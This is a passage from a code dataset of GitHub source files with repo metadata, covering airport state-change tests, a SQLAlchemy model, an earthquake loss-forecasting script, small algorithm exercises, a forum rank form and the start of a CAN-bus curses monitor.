self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'APPROACH', 'LANDED', 'ACCEPTED')\n\n ########################################\n # TESTS FOR REJECTED STATE CHANGE LOGS #\n ########################################\n\n def test_know_aircraft_invalid_state_change_from_PARKED_rejected_log(self):\n aircraft = create_aircraft(call_sign='AB1234', state='PARKED')\n payload = {\n 'state': 'APPROACH',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n 
self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'PARKED', 'APPROACH', 'REJECTED')\n\n def test_know_aircraft_invalid_state_change_from_TAKE_OFF_rejected_log(self):\n aircraft = create_aircraft(call_sign='NC9574', state='TAKE_OFF')\n payload = {\n 'state': 'LANDED',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'TAKE_OFF', 'LANDED', 'REJECTED')\n\n #######################################\n # FAILURES DUE TO AIRPORT CONSTRAINTS #\n #######################################\n\n @override_settings(AIRPORT_RUNAWAYS=1)\n def test_runaway_take_rejected_log(self):\n create_aircraft(call_sign='A1', state='TAKE_OFF')\n aircraft = create_aircraft(call_sign='A2', state='PARKED')\n\n payload = {\n 'state': 'TAKE_OFF',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'PARKED', 'TAKE_OFF', 'REJECTED')\n\n @override_settings(AIRPORT_RUNAWAYS=1)\n def test_runaway_taken_APPROACH_to_LAND_rejected_log(self):\n create_aircraft(call_sign='A1', state='TAKE_OFF')\n aircraft = create_aircraft(call_sign='A2', state='APPROACH')\n\n payload = {\n 'state': 'LANDED',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'APPROACH', 'LANDED', 'REJECTED')\n\n def test_APPROACH_when_other_is_already_APPROACH_reject_log(self):\n create_aircraft(call_sign='A1', state='APPROACH')\n aircraft = create_aircraft(call_sign='A2', state='AIRBORNE')\n\n payload = {\n 'state': 'APPROACH',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'AIRBORNE', 'APPROACH', 'REJECTED')\n\n @override_settings(AIRPORT_LARGE_PARKING_SPOTS=3)\n def test_LANDED_when_no_parking_available_reject_log(self):\n create_aircraft(call_sign='cs1', state='PARKED', type='AIRLINER')\n create_aircraft(call_sign='cs2', state='PARKED', type='AIRLINER')\n create_aircraft(call_sign='cs3', state='PARKED', type='AIRLINER')\n\n aircraft = create_aircraft('CALL_123', state='APPROACH', type='AIRLINER')\n\n payload = {\n 'state': 'LANDED',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{aircraft.call_sign}/intent/', payload)\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'APPROACH', 'LANDED', 'REJECTED')\n\n #####################\n # CUSTOM ASSERTIONS #\n #####################\n\n def test_new_aircraft_added_success_log(self):\n CALL_SIGN = 'MK2408'\n payload = {\n 'type': 'AIRLINER',\n 'state': 'PARKED',\n 'intent': 'TAKE_OFF',\n 'public_key': 'valid public key'\n }\n\n self.client.post(f'/api/{CALL_SIGN}/intent/', payload)\n\n aircraft = Aircraft.objects.first() # aircraft should be created\n\n logs = StateChangeLog.objects.all()\n self.assertEqual(len(logs), 1)\n log = logs[0]\n self.assertLog(log, aircraft, 'PARKED', 'TAKE_OFF', 'ACCEPTED')\n\n #####################\n # CUSTOM ASSERTIONS #\n #####################\n\n def assertLog(self, log, 
expected_aircraft, expected_from_state, expected_to_state, expected_outcome):\n self.assertEqual(log.aircraft, expected_aircraft)\n self.assertEqual(log.from_state, expected_from_state)\n self.assertEqual(log.to_state, expected_to_state)\n self.assertEqual(log.outcome, expected_outcome)\n","repo_name":"milorad-kukic/airport","sub_path":"app/airport/tests/test_state_change_logs.py","file_name":"test_state_change_logs.py","file_ext":"py","file_size_in_byte":7961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74382364641","text":"from sqlalchemy import (\n Column,\n Integer,\n String\n)\n\nfrom sqlalchemy.orm import relationship\nfrom config_db import Base\n\n\nclass Genre(Base):\n \"\"\"\n Genre Model\n \"\"\"\n\n __tablename__ = 'genres'\n\n GenreId = Column(\n Integer,\n primary_key=True\n )\n\n Name = Column(\n String(120)\n )\n\n Tracks = relationship(\n 'Track',\n back_populates='Genre',\n lazy='joined',\n )\n","repo_name":"Carlososuna11/Vinyl-Store","sub_path":"models/genre.py","file_name":"genre.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16167060171","text":"import logging\nimport sys\nimport os\nimport shutil\nimport numpy as np\nimport pandas as pd\nfrom copy import deepcopy\nfrom datetime import datetime\nfrom realtimelosstools.configuration import Configuration\nfrom realtimelosstools.rla import RapidLossAssessment\nfrom realtimelosstools.ruptures import RLA_Ruptures\nfrom realtimelosstools.oelf import OperationalEarthquakeLossForecasting\nfrom realtimelosstools.stochastic_rupture_generator import StochasticRuptureSet\nfrom realtimelosstools.exposure_updater import ExposureUpdater\nfrom realtimelosstools.losses import Losses\nfrom realtimelosstools.postprocessor import PostProcessor\nfrom realtimelosstools.utils import Files, Loader\nfrom realtimelosstools.writers import Writer\n\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nlogger.addHandler(logging.StreamHandler(sys.stdout))\n\nlog_summary = []\n\n\ndef main():\n \"\"\"Run the programme.\"\"\"\n\n # Log the start of the run\n logger.info(\"Real-Time Loss Tools has started\")\n\n # Read configuration parameters\n config = Configuration(\"config.yml\")\n if config.state_dependent_fragilities:\n state_dependent_message = \"Running with state-dependent fragility models\"\n else:\n state_dependent_message = \"Running with state-independent fragility models\"\n logger.info(state_dependent_message)\n\n # Log relevant summary parameters (to create log file that allows\n # for a quick check of correct input)\n log_summary.append(\"Real-Time Loss Tools has started\")\n log_summary.append(\"General description: %s\" % (config.description_general))\n log_summary.append(state_dependent_message)\n log_summary.append(\"%s is path in config file\" % (config.main_path))\n log_summary.append(\"%s is current path\" % (os.getcwd()))\n\n state_dep = Files.find_string_in_file(\n os.path.join(config.main_path, \"current\", \"job.ini\"), \"state_dependent\"\n )\n log_summary.append(\"State dependent: %s\" %(state_dep))\n\n # If 'exposure_model_current.csv' already exists, code cannot run (the 'main_path' indicated\n # in the configuration file may refer to a directory from a previous run that the user may\n # not want to overwrite)\n if os.path.isfile(\n os.path.join(config.main_path, \"current\", \"exposure_model_current.csv\")\n ):\n error_message = (\n \"File 
'exposure_model_current.csv' already exists under %s. The indicated \"\n \"directory may have already been used by a previous run. The program will stop.\"\n % (os.path.join(config.main_path, \"current\"))\n )\n logger.critical(error_message)\n raise OSError(error_message)\n\n # Create sub-directory to store files associated with number of occupants in time\n path_to_occupants = os.path.join(config.main_path, \"current\", \"occupants\")\n if not os.path.exists(path_to_occupants):\n os.mkdir(path_to_occupants)\n else:\n error_message = (\n \"The directory 'occupants' already exists under %s/current and may contain \"\n \"results from a previous run. The program will stop.\"\n % (config.main_path)\n )\n logger.critical(error_message)\n raise OSError(error_message)\n\n # Read input to simulate triggering (calculations after an earthquake of interest and/or\n # at specific points in time, e.g. mid-night)\n triggers = Loader.load_triggers(\n os.path.join(config.main_path, \"triggering.csv\"),\n os.path.join(config.main_path, \"catalogues\")\n )\n log_summary.append(\n \"First filename in triggering.csv is '%s'\" % (triggers.loc[0, \"catalogue_filename\"])\n )\n\n # Load data needed for RLA\n if \"RLA\" in triggers[\"type_analysis\"].to_numpy():\n # Verify/build rupture XML files for RLA\n rla_ruptures = RLA_Ruptures(triggers, config.main_path)\n\n # Damage results from SHM\n damage_results_SHM = pd.read_csv(\n os.path.join(config.main_path, \"shm\", \"damage_results_shm.csv\")\n )\n new_index = pd.MultiIndex.from_arrays(\n [damage_results_SHM[\"building_id\"], damage_results_SHM[\"dmg_state\"]]\n )\n damage_results_SHM.index = new_index\n damage_results_SHM = damage_results_SHM.drop(columns=[\"dmg_state\"])\n\n # Load the consequence models\n consequence_economic = pd.read_csv(\n os.path.join(config.main_path, \"static\", \"consequences_economic.csv\")\n )\n consequence_economic.set_index(\n consequence_economic[\"Taxonomy\"], drop=True, inplace=True\n )\n consequence_economic = consequence_economic.drop(columns=[\"Taxonomy\"])\n\n consequence_injuries = {}\n for severity in config.injuries_scale:\n consequence_injuries[severity] = pd.read_csv(\n os.path.join(\n config.main_path, \"static\", \"consequences_injuries_severity_%s.csv\" % (severity)\n )\n )\n consequence_injuries[severity].set_index(\n consequence_injuries[severity][\"Taxonomy\"], drop=True, inplace=True\n )\n consequence_injuries[severity] = consequence_injuries[severity].drop(\n columns=[\"Taxonomy\"]\n )\n\n # Load the recovery times (used for updating occupants)\n recovery_damage = pd.read_csv(\n os.path.join(config.main_path, \"static\", \"recovery_damage.csv\"),\n dtype={\"dmg_state\": str, \"N_inspection\": int, \"N_repair\":int},\n )\n recovery_damage.set_index(recovery_damage[\"dmg_state\"], drop=True, inplace=True)\n recovery_damage = recovery_damage.drop(columns=[\"dmg_state\"])\n recovery_damage[\"N_damage\"] = recovery_damage[\"N_inspection\"] + recovery_damage[\"N_repair\"]\n\n sum_days = recovery_damage[\"N_damage\"].sum()\n if sum_days < 0.1:\n log_summary.append(\"No update of occupants in 'recovery_damage'\")\n else:\n log_summary.append(\"With update of occupants in 'recovery_damage'\")\n\n # Smallest number of days to allow people back into buildings\n shortest_recovery_span = recovery_damage[\"N_damage\"].min() # days\n\n recovery_injuries = pd.read_csv(\n os.path.join(config.main_path, \"static\", \"recovery_injuries.csv\"),\n dtype={\"injuries_scale\": str, \"N_discharged\": int},\n )\n 
recovery_injuries.set_index(recovery_injuries[\"injuries_scale\"], drop=True, inplace=True)\n recovery_injuries = recovery_injuries.drop(columns=[\"injuries_scale\"])\n\n sum_days = recovery_injuries[\"N_discharged\"].sum()\n if sum_days < 0.1:\n log_summary.append(\"No update of occupants in 'recovery_injuries'\")\n else:\n log_summary.append(\"With update of occupants in 'recovery_injuries'\")\n\n # Load the \"initial\" exposure model\n exposure_model_undamaged = pd.read_csv(\n os.path.join(config.main_path, \"exposure_models\", \"exposure_model_undamaged.csv\")\n )\n exposure_model_undamaged.index = exposure_model_undamaged[\"id\"]\n exposure_model_undamaged.index = exposure_model_undamaged.index.rename(\"asset_id\")\n exposure_model_undamaged = exposure_model_undamaged.drop(columns=[\"id\"])\n\n # Check that consequence models cover all the building classes in 'exposure_model_undamaged'\n classes_are_missing, missing_building_classes = Losses.check_consequence_models(\n {\n \"economic\": consequence_economic,\n \"injuries\": consequence_injuries,\n },\n exposure_model_undamaged\n )\n\n if classes_are_missing:\n error_message = (\n \"The following building classes are missing from the consequence models: %s\"\n % (missing_building_classes)\n )\n logger.critical(error_message)\n raise OSError(error_message)\n\n # Copy the \"initial\" exposure model to the 'current' sub-directory to initialise the process\n in_filename = os.path.join(\n config.main_path, \"exposure_models\", \"exposure_model_undamaged.csv\"\n ) # origin\n out_filename = os.path.join(config.main_path, \"current\", \"exposure_model_current.csv\")\n _ = shutil.copyfile(in_filename, out_filename)\n\n processed_rla = []\n processed_oelf = []\n\n date_latest_rla = None\n\n for i, cat_filename_i in enumerate(triggers[\"catalogue_filename\"].to_numpy()):\n type_analysis_i = triggers[\"type_analysis\"].to_numpy()[i]\n\n logger.info(\n \"%s Running trigger %s of %s: %s with %s\"\n % (np.datetime64('now'), i+1, triggers.shape[0], type_analysis_i, cat_filename_i)\n )\n\n if type_analysis_i == \"RLA\":\n cat_name = cat_filename_i.split(\".\")[0] # Get rid of \".csv\"\n processed_rla.append(cat_name)\n\n # Read earthquake parameters\n earthquake_df = pd.read_csv(\n os.path.join(config.main_path, \"catalogues\", cat_filename_i)\n )\n earthquake_df[\"datetime\"] = pd.to_datetime(earthquake_df[\"datetime\"])\n earthquake_params = earthquake_df.loc[0, :].to_dict()\n\n results = RapidLossAssessment.run_rla(\n earthquake_params,\n config.description_general,\n config.main_path,\n rla_ruptures.mapping[cat_filename_i],\n config.state_dependent_fragilities,\n consequence_economic,\n consequence_injuries,\n recovery_damage,\n recovery_injuries,\n config.injuries_longest_time,\n config.time_of_day_occupancy,\n config.timezone,\n exposure_model_undamaged,\n config.mapping_damage_states,\n damage_results_SHM.loc[:, earthquake_params[\"event_id\"]],\n config.store_intermediate,\n config.store_openquake,\n )\n (\n exposure_updated,\n damage_states,\n losses_economic,\n losses_human,\n injured_still_away,\n occupancy_factors,\n ) = results\n\n # Update 'exposure_model_current.csv'\n exposure_updated.to_csv(\n os.path.join(config.main_path, \"current\", \"exposure_model_current.csv\"),\n index=False,\n )\n\n # Store number of injured people away from the building in time, per asset ID\n injured_still_away.to_csv(\n os.path.join(\n config.main_path,\n \"current\",\n \"occupants\",\n \"injured_still_away_after_RLA_%s.csv\" % (cat_name)\n ),\n 
index=True,\n )\n\n # Store occupancy factors (0: people not allowed in, 1: people allowed in) as a\n # function of time and damage state\n occupancy_factors.to_csv(\n os.path.join(\n config.main_path,\n \"current\",\n \"occupants\",\n \"occupancy_factors_after_RLA_%s.csv\" % (cat_name)\n ),\n index=True,\n )\n\n # Store damage states per building ID\n damage_states.to_csv(\n os.path.join(\n config.main_path,\n \"output\",\n \"damage_states_after_RLA_%s.csv\" % (cat_name)\n ),\n index=True,\n )\n\n # Store economic losses per building ID\n losses_economic.to_csv(\n os.path.join(\n config.main_path,\n \"output\",\n \"losses_economic_after_RLA_%s.csv\" % (cat_name)\n ),\n index=True,\n )\n\n # Store human losses per building ID\n losses_human.to_csv(\n os.path.join(\n config.main_path,\n \"output\",\n \"losses_human_after_RLA_%s.csv\" % (cat_name)\n ),\n index=True,\n )\n\n # Update 'date_latest_rla'\n date_latest_rla = (earthquake_params[\"datetime\"]).to_pydatetime()\n\n elif type_analysis_i == \"OELF\":\n # Read forecast earthquake catalogue\n forecast_cat = pd.read_csv(\n os.path.join(config.main_path, \"catalogues\", cat_filename_i)\n )\n forecast_cat = OperationalEarthquakeLossForecasting.format_seismicity_forecast(\n forecast_cat, add_event_id=True, add_depth=False\n ) # The index of 'forecast_cat' is the unique ID \"[ses_id]-[event_id]\"\n\n # Filter catalogue as per minimum magnitude and maximum distance (so as to not build\n # ruptures for earthquakes that will not be used to calculate damage)\n exposure_lons, exposure_lats = ExposureUpdater.get_unique_exposure_locations(\n exposure_model_undamaged\n )\n forecast_cat_filtered, earthquakes_to_run = (\n OperationalEarthquakeLossForecasting.filter_forecast(\n forecast_cat,\n exposure_lons,\n exposure_lats,\n config.oelf[\"min_magnitude\"],\n config.oelf[\"max_distance\"],\n )\n )\n forecast_cat[\"to_run\"] = earthquakes_to_run\n logger.info(\n \"%s out of %s earthquakes will be run, all other earthquakes \"\n \"will be assumed to cause no damage.\"\n % (earthquakes_to_run.sum(), forecast_cat.shape[0])\n )\n\n # Get rid of \".txt\", replace \".\", \"-\" and \":\" with \"_\"\n forecast_name = (\n \"_\".join(cat_filename_i.split(\".\")[:-1]).replace(\"-\", \"_\").replace(\":\", \"_\")\n )\n processed_oelf.append(forecast_name)\n\n # Create sub-directory to store stochastically-generated rupture XML files\n path_to_ruptures = os.path.join(config.main_path, \"ruptures\", \"oelf\", forecast_name)\n if not os.path.exists(path_to_ruptures):\n os.mkdir(path_to_ruptures)\n else:\n error_message = (\n \"The directory %s already exists under %s/ruptures/oelf and may contain \"\n \"results from a previous run. 
The program will stop.\"\n % (forecast_name, config.main_path)\n )\n logger.critical(error_message)\n raise OSError(error_message)\n\n # Instantiate the rupture set generator from xml\n stoch_rup = StochasticRuptureSet.from_xml(\n os.path.join(config.main_path, \"ruptures\", config.oelf_source_model_filename),\n mmin=4.5, # Minimum magnitude - for calculating total rates\n region_properties=config.oelf[\"rupture_region_properties\"],\n rupture_generator_seed=config.oelf[\"rupture_generator_seed\"]\n )\n\n # Generate the ruptures for all earthquakes in 'forecast'\n ruptures = stoch_rup.generate_ruptures(\n forecast_cat_filtered,\n path_to_ruptures, # Ruptures will be exported to this path\n export_type='xml', # Type of file for export\n )\n\n # Determine if occupants need to be updated (or considered zero), based on the time\n # ellapsed since the last real (RLA) earthquake and the shortest recovery span\n # specified by the user (shortest time to allow occupants back in)\n there_can_be_occupants = (\n OperationalEarthquakeLossForecasting.can_there_be_occupants(\n forecast_cat, date_latest_rla, shortest_recovery_span, (59./(3600.*24.))\n )\n )\n if there_can_be_occupants:\n logger.info(\"There might be occupants in buildings during OELF calculation.\")\n else:\n logger.info(\n \"Occupants are all zero during OELF calculation \"\n \"(too short time since last real earthquake)\"\n )\n\n damage_states, losses_economic, losses_human = (\n OperationalEarthquakeLossForecasting.run_oelf(\n forecast_cat,\n forecast_name,\n there_can_be_occupants,\n config.oelf[\"continuous_ses_numbering\"],\n config.oelf[\"ses_range\"],\n config.state_dependent_fragilities,\n config.description_general,\n config.main_path,\n exposure_model_undamaged,\n consequence_economic,\n consequence_injuries,\n recovery_damage,\n recovery_injuries,\n config.injuries_longest_time,\n config.time_of_day_occupancy,\n config.timezone,\n config.mapping_damage_states,\n config.store_intermediate,\n config.store_openquake,\n )\n )\n\n # Store damage states per building ID\n damage_states.to_csv(\n os.path.join(\n config.main_path,\n \"output\",\n \"damage_states_after_OELF_%s.csv\" % (forecast_name)\n ),\n index=True,\n )\n\n # Store economic losses per building ID\n losses_economic.to_csv(\n os.path.join(\n config.main_path,\n \"output\",\n \"losses_economic_after_OELF_%s.csv\" % (forecast_name)\n ),\n index=True,\n )\n\n # Store human losses per building ID\n losses_human.to_csv(\n os.path.join(\n config.main_path,\n \"output\",\n \"losses_human_after_OELF_%s.csv\" % (forecast_name)\n ),\n index=True,\n )\n\n # Post-process individual outputs\n if config.post_process[\"collect_csv\"]:\n exposure_expected_costs_occupants = Losses.get_expected_costs_occupants(\n exposure_model_undamaged\n )\n PostProcessor.export_collected_output_damage(\n config.main_path, processed_rla, processed_oelf\n )\n\n PostProcessor.export_collected_output_losses_economic(\n config.main_path, processed_rla, processed_oelf, exposure_expected_costs_occupants\n )\n\n PostProcessor.export_collected_output_losses_human(\n config.main_path,\n config.injuries_scale,\n processed_rla,\n processed_oelf,\n exposure_expected_costs_occupants,\n )\n\n # Save 'log_summary' (to create log file that allows for a quick check of correct input)\n log_summary.append(\"Real-Time Loss Tools has finished\")\n Writer.write_txt_from_list(\n log_summary, os.path.join(config.main_path, \"quick_input_check.txt\")\n )\n\n # Leave the program\n logger.info(\"Real-Time Loss Tools has 
finished\")\n sys.exit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CINievas/real-time-loss-tools","sub_path":"realtimelosstools/realtimelosstools.py","file_name":"realtimelosstools.py","file_ext":"py","file_size_in_byte":19049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74766605600","text":"# 빨강(red), 초록(green), 파랑(blue) 빛을 섞어 여러 가지 다른 색 빛을 만들어 내려고 한다.\n\n# 빨강(r), 초록(g), 파랑(b) 각 빛의 가짓수가 주어질 때,\n# 주어진 rgb 빛들을 섞어 만들 수 있는 모든 경우의 조합(r g b)과 만들 수 있는 색의 가짓 수를 계산해보자. \n\nr, g, b = map(int, input().split())\n\ncnt = 0\n\nfor i in range(r):\n for j in range(g):\n for k in range(b):\n print('%d %d %d' %(i, j, k))\n\n cnt += 1\n\nprint(cnt)\n","repo_name":"ererink/TIL","sub_path":"Algorithm/codeup/6083.py","file_name":"6083.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"ko","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"73680265761","text":"import numpy as np\nimport scipy.io\nfrom datasets.read_libsvm import *\nimport logging\nimport logging.config\nimport os\n\ndef libsvm2mat(fname, ndata, nfeatures, binary=True):\n\n FORMAT = '%(asctime)-15s %(message)s'\n logging.basicConfig(format=FORMAT, level=logging.DEBUG)\n logger = logging.getLogger(\"opt\")\n\n logger.info(\"Starting data read\")\n\n (X, d) = readLibSVM(fname=fname, ndata=ndata, nfeatures=nfeatures, binary=binary)\n\n # Permute rows\n #logger.info(\"Permuting rows\")\n #np.random.seed(42)\n #perm = np.random.permutation(ndata)\n #X = X[perm, :]\n #d = d[perm]\n\n logger.info(\"Convert dataset to CSC, in transposed form\")\n X = X.tocsr().transpose()\n\n logger.info(\"Saving full dataset ...\")\n\n # Save in matlab format\n scipy.io.savemat(\n file_name=\"%s.mat\" % fname,\n mdict={'X': X, 'd': d},\n do_compression=True,\n format='5',\n oned_as='row')\n \n logger.info(\"Done!!!\")\n","repo_name":"adefazio/point-saga","sub_path":"datasets/libsvm2mat.py","file_name":"libsvm2mat.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"54"} +{"seq_id":"29646631210","text":"#!/usr/bin/env python\nimport sys\nimport json\nimport codecs\nimport collections\n\n\ndef main(args):\n\tfield = args[0]\n\tarray = json.load(sys.stdin)\n\ts = [unicode(e[field]) for e in array]\n\ts = [(item, count) for item, count in collections.Counter(s).items() if count > 1]\n\tw = codecs.getwriter('utf-8')(sys.stdout)\n\tfor item, count in sorted(s):\n\t\tw.write(u\"%d - %s\\n\" % (count, item))\n\tw.flush()\n\n\nif __name__ == '__main__':\n\tmain(sys.argv[1:])\n","repo_name":"apecpt/apec-importers","sub_path":"tools/dups.py","file_name":"dups.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4539494818","text":"import re\nclass Solution(object):\n def simplifyPath(self, path):\n paths = re.split('/+', path)\n stack = []\n for ch in paths:\n if ch == '' or ch == '.':\n continue\n elif ch == '..':\n if len(stack) > 0:\n stack.pop()\n else:\n stack.append(ch)\n if len(stack) == 0:\n return '/'\n res = ''\n for folder in stack:\n res = res + '/' + folder\n return res","repo_name":"robbyvan/looseCannon","sub_path":"String/71_simplifyPath.py","file_name":"71_simplifyPath.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36455287650","text":"'''\nMin 
Absolute Diff\nGiven a list find the minimum absolute difference between any to elements.\n\nInput\nFirst line is N Then follows a line consisting of N numbers. (N >= 2)\n\nOutput\nPrint a single number the min difference.\n\nExample\nInput:\n\n4\n\n5 2 1 3\n\nOutput: 1\n'''\n'''\n\nn=int(input())\nb=list(map(int,input().split()))\nmi=abs(b[0]-b[1])\nfor i in range(n):\n for j in range(n):\n if i!=j:\n su=abs(b[i]-b[j])\n if mi>su:\n mi=su\nprint(mi)\nproblem- more time complexity\n'''\n'''\nn=int(input())\nb=list(map(int,input().split()))\nb=sorted(b)\nmi=abs(b[0]-b[1])\nfor i in range(1,n):\n temp=b[i-1]\n j=i\n while (temp<=(b[j]+mi)) and j<(n-1):\n su=abs(temp-b[i])\n if mi>su:\n mi=su\n j=j+1\nprint(mi)\nproblem- more time complexity\n'''\nn=int(input())\nb=list(map(int,input().split()))\nb=sorted(b)\nmi=abs(b[0]-b[1])\nfor i in range(1,n):\n sub=abs(b[i]-b[i-1])\n if mi>sub:\n mi=sub\nprint(mi)\n","repo_name":"iamnishantchandra/DSA-QA-Using-Python","sub_path":"10X/Python/Array/MinAbsoluteDiff.py","file_name":"MinAbsoluteDiff.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"5677577203","text":"from django.core.validators import RegexValidator\nfrom django.utils.translation import ugettext_lazy as _\nimport floppyforms as forms\nfrom misago.forms import Form, YesNoSwitch\nfrom misago.models import Role\nfrom misago.validators import validate_sluggable\n\nclass RankForm(Form):\n name = forms.CharField(label=_(\"Rank Name\"),\n \t\t\t\t\t help_text=_(\"Rank Name is used to identify rank in Admin Control Panel and is used as page and tab title if you decide to make this rank act as tab on users list.\"),\n \t\t\t\t\t max_length=255, validators=[validate_sluggable(\n _(\"Rank name must contain alphanumeric characters.\"),\n _(\"Rank name is too long.\")\n )])\n description = forms.CharField(label=_(\"Rank Description\"),\n \t\t\t\t\t\t\t help_text=_(\"If this rank acts as tab on users list, here you can enter optional description that will be displayed above list of users with this rank.\"),\n \t\t\t\t\t\t\t widget=forms.Textarea, required=False)\n title = forms.CharField(label=_(\"Rank Title\"),\n \t\t\t\t\t\thelp_text=_(\"Short description of rank's bearer role in your community.\"),\n \t\t\t\t\t\tmax_length=255, required=False)\n style = forms.CharField(label=_(\"Rank CSS Class\"),\n \t\t\t\t\t\thelp_text=_(\"Optional CSS class that will be added to different elements displaying rank's owner or his content, allowing you to make them stand out from other members.\"),\n \t\t\t\t\t\tmax_length=255, required=False)\n special = forms.BooleanField(label=_(\"Special Rank\"),\n \t\t\t\t\t\t\t help_text=_(\"Special ranks are ignored during updates of user ranking, making them unattainable without admin ingerention.\"),\n \t\t\t\t\t\t\t widget=YesNoSwitch, required=False)\n as_tab = forms.BooleanField(label=_(\"As Tab on Users List\"),\n \t\t\t\t\t\t\thelp_text=_(\"Should this rank have its own page on users list, containing rank's description and list of users that have it? 
This is good option for rank used by forum team members or members that should be visible and easily reachable.\"),\n \t\t\t\t\t\t\twidget=YesNoSwitch, required=False)\n on_index = forms.BooleanField(label=_(\"Display members online\"),\n \t\t\t\t\t\t\t help_text=_(\"Should users online with this rank be displayed on board index?\"),\n \t\t\t\t\t\t\t widget=YesNoSwitch, required=False)\n criteria = forms.CharField(label=_(\"Rank Criteria\"),\n \t\t\t\t\t\t help_text=_(\"This setting allows you to limit number of users that can attain this rank. Enter 0 to assign this rank to all members (good for default rank). To give this rank to 10% of most active members, enter \\\"10%\\\". To give this rank to 10 most active members, enter \\\"10\\\". This setting is ignored for special ranks as they don't participate in user's ranking updates.\"),\n \t\t\t\t\t\t max_length=255, initial='0', validators=[RegexValidator(regex='^(\\d+)(%?)$', message=_('This is incorrect rank match rule.'))], required=False)\n roles = False\n\n def finalize_form(self):\n if self.request.user.is_god():\n self.add_field('roles', forms.ModelMultipleChoiceField(label=_(\"Rank Roles\"),\n \t\t\t\t\t\t\t\t\t\t\t\t\t help_text=_(\"You can grant users with this rank extra roles to serve either as rewards or signs of trust to active members.\"),\n \t\t\t \t\t\t\t\t\t\t\t\t\t widget=forms.CheckboxSelectMultiple, queryset=Role.objects.order_by('name').all(), required=False))\n else:\n self.add_field('roles', forms.ModelMultipleChoiceField(label=_(\"Rank Roles\"),\n \t\t\t\t\t\t\t\t\t\t\t\t\t help_text=_(\"You can grant users with this rank extra roles to serve either as rewards or signs of trust to active members.\"),\n \t\t\t \t\t\t\t\t\t\t\t\t\t widget=forms.CheckboxSelectMultiple, queryset=Role.objects.filter(protected__exact=False).order_by('name').all(), required=False))\n","repo_name":"Maronato/aosalunos","sub_path":"misago/apps/admin/ranks/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31033942348","text":"#!/usr/bin/env python\nimport curses\nimport can\nimport sys\nimport threading\nimport time\n\n\nbustype = 'socketcan'\nrun = True\n\nclass BottomMenu():\n def __init__(self, assigned_window, tui):\n self.window = assigned_window\n self.tui = tui\n self.tui.lock.acquire()\n self.window.addstr(\"F5\", curses.color_pair(TUI.COLOR_MENU_SHORTCUT))\n self.window.addstr(\"Redraw\", curses.color_pair(TUI.COLOR_MENU_DESC))\n self.window.addstr(\"F6\", curses.color_pair(TUI.COLOR_MENU_SHORTCUT))\n self.window.addstr(\"SortBy\", curses.color_pair(TUI.COLOR_MENU_DESC))\n self.window.addstr(\"F8\", curses.color_pair(TUI.COLOR_MENU_SHORTCUT))\n self.window.addstr(\"Clear\", curses.color_pair(TUI.COLOR_MENU_DESC))\n self.window.addstr(\"F10\", curses.color_pair(TUI.COLOR_MENU_SHORTCUT))\n self.window.addstr(\"Quit\", curses.color_pair(TUI.COLOR_MENU_DESC))\n self.drawn = False\n self.tui.lock.release()\n\n def redraw(self):\n if not self.drawn:\n self.tui.lock.acquire()\n self.window.refresh()\n self.drawn = True\n self.tui.lock.release()\n\nclass MessagesHeader():\n def __init__(self, assigned_window, tui):\n self.window = assigned_window\n self.drawn = False\n self.tui = tui\n self.sort = None\n self.sortAscending = False\n\n def redraw(self):\n if not self.drawn:\n self.tui.lock.acquire()\n self.window.bkgd(' ', curses.color_pair(TUI.COLOR_HEADER))\n for col in self.tui.visibleColumns:\n text = 
